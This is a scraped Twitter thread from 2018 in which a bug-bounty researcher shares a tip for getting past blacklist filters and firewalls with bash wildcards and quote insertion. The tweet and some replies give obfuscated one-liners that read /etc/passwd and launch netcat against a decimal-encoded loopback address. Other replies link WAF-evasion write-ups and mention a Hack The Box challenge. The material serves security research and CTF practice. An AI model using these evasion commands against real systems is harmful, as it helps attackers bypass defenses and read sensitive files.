Keyboard Shortcuts

Keyboard shortcuts are available for common actions and site navigation.

Skip to content
  • Home Home Home, current page.
  • About
  • Have an account? Log in
omespino's profile
Omar Espino
Omar Espino
Omar Espino
@omespino

Tweets

Omar Espino

@omespino

acknowledged by / security hall of fame : • google • microsoft • facebook • twitter • telegram • netflix • slack • yahoo • nokia • atlassian • sony •

http://0/
omespino.com
Joined August 2010

Tweets

  • © 2019 Twitter
  • About
  • Help Center
  • Terms
  • Privacy policy
  • Cookies
  • Ads info
Omar Espino‏ @omespino

#Protip can somebody read your passwd file with: "/???/?at /???/????w?" ? yes. bypass blacklisted words filter (or firewalls) via bash wildcards. /b'i'n/c'a't /e't'c/p'a's's'w'd' /???/?at /???/????w? /usr/b'i'n/'n'c 2130706433 80 /???/???/n? 2130706433 80 #BugBounty #infosecpic.twitter.com/M35RHcBuAN

3:03 AM - 23 May 2018
  • 1,254 Retweets
  • 2,419 Likes
  • Shantanu Kulkarni 黄泉 :~) Nimit KeyStrOke Tobias bug bounty tips - Retweet xdev lih3iu
31 replies 1,254 retweets 2,419 likes
    1. New conversation
    2. F3D ツ‏ @f3d__ 23 May 2018
      Replying to @omespino

      Good read here:https://medium.com/secjuice/waf-evasion-techniques-718026d693d8…

      3 replies 63 retweets 165 likes
    3. Omar Espino‏ @omespino 23 May 2018
      Replying to

      wow, thanks for sharing.

      0 replies 0 retweets 2 likes
    4. End of conversation
    1. New conversation
    2. 𝓓ᵉⓥ𝐎ⓝ ǤŕẸєŇ𝔢‏ @DasMeDevon Jan 10
      Replying to @omespino

      Thanks for reminding the community and showing in Windows. Here's a blog I wrote in 2016 after seeing the technique used by nation state actors, good stuff -- https://www.ixiacom.com/company/blog/equation-group-musings-sfg-command …

      1 reply 1 retweet 2 likes
    3. Omar Espino‏ @omespino Jan 11
      Replying to

      Omar Espino Retweeted Omar Espino

      neat, this is a pretty cool reading, also I shared some time ago pretty similar techniques for unix / linux, thanks for sharinghttps://twitter.com/omespino/status/999229294286077954…

      Omar Espino added,

      Omar Espino @omespino
      #Protip can somebody read your passwd file with: "/???/?at /???/????w?" ? yes. bypass blacklisted words filter (or firewalls) via bash wildcards. …
      0 replies 0 retweets 1 like
    4. End of conversation
    1. New conversation
    2. Shoeb Patel‏ @0xCaptainFreak 23 May 2018
      Replying to @omespino

      Yea .. this bypasses are good for flux capacitor.htb😂😂

      1 reply 0 retweets 8 likes
    3. Omar Espino‏ @omespino 23 May 2018
      Replying to

      I seems that this techniques work for that too, some people ask me how to solve that via inbox but I even didn't know that this challenge existed looool

      0 replies 0 retweets 0 likes
    4. End of conversation
    1. New conversation
    2. V Baczyński‏ @V_Baczynski 24 May 2018
      Replying to @omespino

      /bin/cat `echo /*/p*ssw*`

      1 reply 0 retweets 1 like
    3. Omar Espino‏ @omespino 24 May 2018
      Replying to

      also /???/?at $(echo /*/p***w*)

      0 replies 0 retweets 1 like
    4. End of conversation
    1. New conversation
    2. ReturnAgain‏ @r3turn0riented 23 May 2018
      Replying to @omespino

      @hackthebox_eu Flux Capacitor work in progress? :D

      1 reply 0 retweets 1 like
    3. Omar Espino‏ @omespino 23 May 2018
      Replying to

      not really, loool

      0 replies 0 retweets 0 likes
    4. End of conversation
    • © 2019 Twitter
    • About
    • Help Center
    • Terms
    • Privacy policy
    • Cookies
    • Ads info